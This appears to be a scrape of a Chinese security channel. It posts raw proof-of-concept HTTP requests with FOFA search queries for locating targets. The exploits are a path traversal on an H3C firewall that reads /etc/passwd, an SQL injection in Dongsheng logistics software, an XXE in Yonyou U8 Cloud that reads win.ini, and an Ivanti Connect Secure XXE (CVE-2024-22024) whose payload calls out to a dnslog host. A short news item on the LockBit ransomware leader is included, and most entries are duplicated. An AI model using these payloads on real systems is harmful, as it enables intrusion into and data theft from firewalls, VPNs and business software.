H3C下一代防火墙任意文件读取漏洞
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
product="H3C-下一代防火墙"
/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
东胜物流软件-SaveUserQuerySetting接口存在SQL注入漏洞
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
❤1
用友U8 Cloud smartweb2.RPC.d xxe漏洞
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)
Forwarded from 蓝点网订阅频道
#科技资讯 #安全资讯 LockBit 勒索软件头目发布公开信,称自己过去几年沉迷于美女和游艇,导致未能升级 PHP 进而被 FBI 入侵。
查看全文:https://ourl.co/102565
LockBitSupp 称过去五年沉迷在金钱的海洋里,导致自己倦怠了,继续沉迷于游艇和美女,所以还在使用带有漏洞的 PHP 版本。
另外还透露 FBI 没抓人就动手是因为牵涉到了特朗普的一些法庭文件。
查看全文:https://ourl.co/102565
LockBitSupp 称过去五年沉迷在金钱的海洋里,导致自己倦怠了,继续沉迷于游艇和美女,所以还在使用带有漏洞的 PHP 版本。
另外还透露 FBI 没抓人就动手是因为牵涉到了特朗普的一些法庭文件。
😁9
Ivanti Pulse Connect Secure VPN 存在XXE 漏洞(CVE-2024-22024)
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4